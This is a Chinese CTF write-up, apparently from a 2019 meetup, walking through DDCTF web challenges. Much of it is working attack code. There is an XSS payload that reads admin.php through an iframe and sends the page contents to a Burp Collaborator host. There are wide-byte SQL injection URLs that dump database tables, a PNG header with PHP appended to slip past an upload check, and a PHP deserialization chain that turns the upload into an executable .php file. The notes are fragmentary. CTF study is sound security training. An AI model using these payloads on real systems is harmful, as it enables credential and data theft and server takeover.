20190531周五交流会

欢迎来到DDCTF

题目链接: http://117.51.147.2/Ze02pQYLf5gGNyMn/

扫目录可以看到admin.php

xss可以获取源码

一开始需要xss

iframe标签

<script src=”//8pymkidcahyx6m4zm73lm4nan1trhg.burpcollaborator.net”>

<iframe src=”//baidu.com”>

Burp Collaborator

https://blog.csdn.net/TENCENTSYS/article/details/89396367

DNS解析记录和HTTP访问记录

检测 xss ssrf BlindSqli

https://xsspt.com/index.php

function s(e) {
  var t = new XMLHttpRequest;
  t.open("POST", "http://ynp2n4klezlehdj2dqgro2hunltbh0.burpcollaborator.net/BeSRcb", !0),
  t.setRequestHeader("Content-type", "text/plain"),
  t.onreadystatechange = function() {
    t.readyState  == 4 && t.status == 200 //请求已经准备就绪
  },
  t.send(e);
};
 
var a = document.createElement("ifr"+"ame");
 
a.src = "./admin.php";
 
document.body.appendChild(a);
a.onload = function (){
  var c = document.getElementsByTagName("ifr"+"ame")[0]["contentWin"+"dow"].document.getElementsByTagName("body")[0].innerHTML;
  s("5am3: "+c);
};
a.onerror = function (){
    s("5am3 error!");
};

复现的时候发现环境挂了,总之源码里面可以看到一个接口

http://117.51.147.2/Ze02pQYLf5gGNyMn/query_aIeMu0FUoVrW0NWPHbN6z4xh.php?id=%27

看报文有GBK,可能是宽字节注入

‘ —> \’

%df\’变成%df%5C

?id=1%df' union select 1,2,3,table_schema,table_name from information_schema.tables%23
?id=1%df' union select 1,2,3,4,column_name from information_schema.columns%23
?id=1%df' union select 1,2,ctf_value,4,5 from ctfdb.ctf_fhmHRPL5%23

upload

、、

、、、、、、、、、、、、、、、mvc设计模、

model-view-controller

http://domainName/index.php/模块/控制器/操作

路由在 /route/route.php

然后去/web目录看

有2个断点

Register.php:
Index.php

Register

注册不成功

Register 里有call函数

当调用的函数不存在于这个类的时候,就会触发__call()函数 ,__call 会调用自身的 name 成员变量所指代的变量所指代的方法


思路:当反序列化后进入destruct函数,令rigist=0,然后让check=profile类,然后又因为该类中没有index函数就进入了__call函数里面,如果此时让index等于一个值那么就可以调用其他函数进行非正常操作了。


传图片

getimagesize()+后缀.png判断
winhex中添加hex
8950 4E47 0D0A 1A0A 3C3F 7068 7020 7068 7069 6E66 6F28 293B 203F 3E


先传一次记一下路径 /upload/3b1412753f475cc969c37231dd6eaea2/32d3ca5e23f4ccf1e4c8660c40e75f33.png


构造反序列化

$r = new Register();
$r->registed = 0;
$r->checker = new Profile();
$r->checker->index = 'upload_img';
$r->checker->filename_tmp = '../public/upload/3b1412753f475cc969c37231dd6eaea2/32d3ca5e23f4ccf1e4c8660c40e75f33.png';
$r->checker->filename =  '../public/upload/3b1412753f475cc969c37231dd6eaea2/fuck.php';
$r->checker->ext=1;
$r->checker->checker=0;
echo urlencode(base64_encode(serialize($r)));

改cookie


发表评论

电子邮件地址不会被公开。 必填项已用*标注